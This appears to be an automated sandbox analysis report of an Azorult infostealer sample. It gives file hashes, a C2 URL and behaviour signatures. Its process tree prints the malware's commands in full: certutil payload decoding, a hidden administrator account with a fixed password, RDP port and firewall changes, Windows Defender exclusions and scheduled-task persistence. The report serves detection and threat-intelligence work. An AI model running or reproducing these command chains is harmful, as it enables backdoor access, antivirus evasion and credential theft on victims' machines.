Analysis

  • max time kernel
    130s
  • max time network
    105s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22-12-2024 18:16

General

  • Target

    c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe

  • Size

    3.2MB

  • MD5

    7aaa757fa6b13340fa16c6c7eebb0c0f

  • SHA1

    3ea1381da382411231389c8be2c1117310a8efe0

  • SHA256

    c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07

  • SHA512

    1e372f60f5262742435ed5fddca5cf01362497b930ca614e30e3661defa74c8e2d8934926b94ae94f94c42b6d6e972afb0c3dfddb5bf7b928c4c7accc21ebe53

  • SSDEEP

    98304:i1Eu7EywnDEADZ6dly16EOM8RvFs4j25wcMIn:i1ERNnDEAFwM16E+RvFs4j8w+n

Malware Config

Extracted

Family

azorult

C2

http://0-800-email.com/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 6 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Deobfuscate/Decode Files or Information 1 TTPs 3 IoCs

    Payload decoded via CertUtil.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • Drops file in System32 directory 12 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 11 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe
    "C:\Users\Admin\AppData\Local\Temp\c997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2116
    • C:\Windows\SysWOW64\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode dera deras
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      PID:2764
    • C:\Windows\SysWOW64\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode sfera sferas
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      PID:2708
    • C:\Windows\SysWOW64\certutil.exe
      "C:\Windows\System32\certutil.exe" -decode bruto brutos
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      PID:2924
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" deras
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3000
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" brutos
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\CLNT.vbs" "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat" "C:\Users\Admin\AppData\Roaming\jJF.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1708
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn BsqsRhUj
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1496
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe "C:\Users\Admin\AppData\Roaming\ieql.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" "{7FB22DB6-7827-4FED-A97A-E3C32288467B}" "C:\Users\Admin\AppData\Roaming\jJF.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2184
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jJF.dll" /tn OqlIVbcp
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\aYOPKyHNFQ.bat MENVELaJIp iFxgLSBWge"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2952
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2392
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic group where sid="S-1-5-32-544" get name /value
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2164
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1032
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic group where sid="S-1-5-32-555" get name /value
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1072
          • C:\Windows\SysWOW64\net.exe
            net user MENVELaJIp iFxgLSBWge /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:780
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
              6⤵
              • System Location Discovery: System Language Discovery
              PID:828
          • C:\Windows\SysWOW64\net.exe
            net localgroup Administrators MENVELaJIp /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:940
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1848
          • C:\Windows\SysWOW64\net.exe
            net localgroup "Remote Desktop Users" MENVELaJIp /add
            5⤵
            • Remote Service Session Hijacking: RDP Hijacking
            • System Location Discovery: System Language Discovery
            PID:896
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 localgroup "Remote Desktop Users" MENVELaJIp /add
              6⤵
              • Remote Service Session Hijacking: RDP Hijacking
              • System Location Discovery: System Language Discovery
              PID:832
          • C:\Windows\SysWOW64\net.exe
            net accounts /maxpwage:unlimited
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1532
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 accounts /maxpwage:unlimited
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2320
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
            5⤵
            • Hide Artifacts: Hidden Users
            • System Location Discovery: System Language Discovery
            PID:2196
          • C:\Windows\SysWOW64\reg.exe
            reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2940
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1372
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:768
          • C:\Windows\SysWOW64\timeout.exe
            Timeout /t 15
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:352
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\autoupdate.bat"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1784
          • C:\Windows\SysWOW64\fsutil.exe
            fsutil dirty query C:
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2060
          • C:\Windows\SysWOW64\sc.exe
            sc queryex "TermService"
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2920
          • C:\Windows\SysWOW64\find.exe
            find "STATE"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1324
          • C:\Windows\SysWOW64\find.exe
            find /v "RUNNING"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1564
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1592
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
            5⤵
            • Server Software Component: Terminal Services DLL
            • Executes dropped EXE
            • Modifies WinLogon
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:3036
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2284
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2900
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1708
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c query session rdp-tcp
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1896
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
            5⤵
            • Server Software Component: Terminal Services DLL
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2064
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall delete rule name="Remote Desktop"
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2856
          • C:\Program Files\RDP Wrapper\RDPWInst.exe
            "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
            5⤵
            • Server Software Component: Terminal Services DLL
            • Executes dropped EXE
            • Modifies WinLogon
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:992
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2552
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:752
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:280
          • C:\Windows\SysWOW64\reg.exe
            reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:324
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2240
            • C:\Windows\SysWOW64\cscript.exe
              cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1212
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1644
            • C:\Windows\SysWOW64\reg.exe
              reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:296
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:376
          • C:\Windows\SysWOW64\findstr.exe
            findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2980
    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
      "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com" sferas
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com"
        3⤵
        • Executes dropped EXE
        PID:2444
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: LoadsDriver
    PID:1568
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {3971B318-4712-46E1-A4B0-0A3301C46688} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
    1⤵
      PID:320
      • C:\Windows\System32\WScript.exe
        C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\CLNT.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat"
        2⤵
          PID:1344
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat
            3⤵
            • Drops file in System32 directory
            PID:2120
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              4⤵
                PID:2780
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic group where sid="S-1-5-32-544" get name /value
                  5⤵
                    PID:2644
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                  4⤵
                    PID:796
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic group where sid="S-1-5-32-555" get name /value
                      5⤵
                        PID:1496
                    • C:\Windows\system32\net.exe
                      net user MENVELaJIp iFxgLSBWge /add
                      4⤵
                        PID:1204
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
                          5⤵
                            PID:2020
                        • C:\Windows\system32\net.exe
                          net localgroup Administrators MENVELaJIp /add
                          4⤵
                            PID:1308
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
                              5⤵
                                PID:1036
                            • C:\Windows\system32\net.exe
                              net localgroup Remote Desktop Users MENVELaJIp /add
                              4⤵
                                PID:1300
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add
                                  5⤵
                                    PID:1068
                                • C:\Windows\system32\net.exe
                                  net accounts /maxpwage:unlimited
                                  4⤵
                                    PID:2356
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                      5⤵
                                        PID:1740
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
                                      4⤵
                                      • Hide Artifacts: Hidden Users
                                      PID:2180
                                    • C:\Windows\system32\reg.exe
                                      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                                      4⤵
                                        PID:700
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                                        4⤵
                                        • Modifies Windows Firewall
                                        • Event Triggered Execution: Netsh Helper DLL
                                        PID:2940
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1540
                                      • C:\Windows\system32\timeout.exe
                                        Timeout /t 15
                                        4⤵
                                        • Delays execution with timeout.exe
                                        PID:2444
                                  • C:\Windows\System32\WScript.exe
                                    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" MENVELaJIp iFxgLSBWge "{7FB22DB6-7827-4FED-A97A-E3C32288467B}"
                                    2⤵
                                    • Blocklisted process makes network request
                                    PID:2416
                                  • C:\Windows\System32\WScript.exe
                                    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\OwDsV.vbs" MENVELaJIp iFxgLSBWge "{7FB22DB6-7827-4FED-A97A-E3C32288467B}"
                                    2⤵
                                    • Blocklisted process makes network request
                                    PID:804
                                  • C:\Windows\System32\WScript.exe
                                    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\CLNT.vbs" MENVELaJIp iFxgLSBWge "C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat"
                                    2⤵
                                      PID:1776
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\KfFhiFEm.bat
                                        3⤵
                                        • Drops file in System32 directory
                                        PID:2308
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                                          4⤵
                                            PID:2948
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic group where sid="S-1-5-32-544" get name /value
                                              5⤵
                                                PID:2932
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                                              4⤵
                                                PID:2704
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic group where sid="S-1-5-32-555" get name /value
                                                  5⤵
                                                    PID:2672
                                                • C:\Windows\system32\net.exe
                                                  net user MENVELaJIp iFxgLSBWge /add
                                                  4⤵
                                                    PID:2552
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user MENVELaJIp iFxgLSBWge /add
                                                      5⤵
                                                        PID:1164
                                                    • C:\Windows\system32\net.exe
                                                      net localgroup Administrators MENVELaJIp /add
                                                      4⤵
                                                        PID:1848
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 localgroup Administrators MENVELaJIp /add
                                                          5⤵
                                                            PID:1720
                                                        • C:\Windows\system32\net.exe
                                                          net localgroup Remote Desktop Users MENVELaJIp /add
                                                          4⤵
                                                            PID:992
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 localgroup Remote Desktop Users MENVELaJIp /add
                                                              5⤵
                                                                PID:752
                                                            • C:\Windows\system32\net.exe
                                                              net accounts /maxpwage:unlimited
                                                              4⤵
                                                                PID:324
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                  5⤵
                                                                    PID:288
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MENVELaJIp /t REG_DWORD /d "00000000" /f
                                                                  4⤵
                                                                  • Hide Artifacts: Hidden Users
                                                                  PID:2240
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                                                                  4⤵
                                                                    PID:296
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                                                                    4⤵
                                                                    • Modifies Windows Firewall
                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                    PID:1644
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Drops file in System32 directory
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2500
                                                                  • C:\Windows\system32\timeout.exe
                                                                    Timeout /t 15
                                                                    4⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:2348

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Program Files\RDP Wrapper\autoupdate.bat

                                                              Filesize

                                                              12KB

                                                              MD5

                                                              b365fde3be7855f4254d1e4bba45d260

                                                              SHA1

                                                              b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

                                                              SHA256

                                                              2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

                                                              SHA512

                                                              d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

                                                            • C:\Program Files\RDP Wrapper\rdpwrap.ini

                                                              Filesize

                                                              115KB

                                                              MD5

                                                              3b18b58b5b9d32e1e8dc3d4f681227cd

                                                              SHA1

                                                              fd328b70f225a372903a3b36567779891f39dc32

                                                              SHA256

                                                              79173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf

                                                              SHA512

                                                              ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                              Filesize

                                                              342B

                                                              MD5

                                                              21a7571e8fd4e2f681f0d814986fb433

                                                              SHA1

                                                              d514853c5dfecac165658159c35780dc3c171bd0

                                                              SHA256

                                                              b3fee1668d9622666a61a62033cfee0dd66aabf25ebb930557133b7068624c84

                                                              SHA512

                                                              f429512740f1440ef22c7e3b0fc6c4b8d04fc539e3ffc055352ac8a3266a8c7805964737d220eb50648c84a836a5801c2b436a4773335485547388bd9901d11b

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\IZBf.exe

                                                              Filesize

                                                              112KB

                                                              MD5

                                                              17567f841e0839a64a23f57f10ecc464

                                                              SHA1

                                                              61d1bdb90dce2493c0d0c8c6fe826fdab2f14bb4

                                                              SHA256

                                                              09fd43e052a13d5624d70c32e921e93bf366682fe7f218c1ec015b892b7b13e5

                                                              SHA512

                                                              746f3f9d78e7bbafa0cadd8a7ed7b8f6a1fac639cc6488fe39f866ab7b34d93c5dda00a02528b3a1ae7b42ab52895740d3309a67898acd449be31121b17e192b

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\LXOi.exe

                                                              Filesize

                                                              393KB

                                                              MD5

                                                              4699072b245bd2c2a22b7d08aecdf82d

                                                              SHA1

                                                              08261c8982d46e39b59e685e47df442b42f97f10

                                                              SHA256

                                                              24b5befb7bb4b85ef61f8f86c878f508e5f1716f3de03abe183939c2dd115e8b

                                                              SHA512

                                                              a32ed45751392698d20434ab8f849819832e10cd859a929216f8516cd8933cf52813319a7eab703bc45736def5c67f5e974a07b02c7e459a11aadc915b5c336c

                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\bruto

                                                              Filesize

                                                              542KB

                                                              MD5

                                                              05151f488f7e6ade25f0b1dc17c0291d

                                                              SHA1

                                                              aae7feac5765450eff7c5b1c0d5300c2e1ecef3a

                                                              SHA256

                                                              58ef678cd87678a30de6f8955886c4e92c73253d23e6b3d86ca3786d5fd712f5

                                                              SHA512

                                                              eab7bd839c5f1d229cd1b1fa473572df345584483209a7b10f7aaac827e7489eaafd3d5f165ec63172596e7994b7da216027c7bc8cfdccabde8cfe2114aff4fc

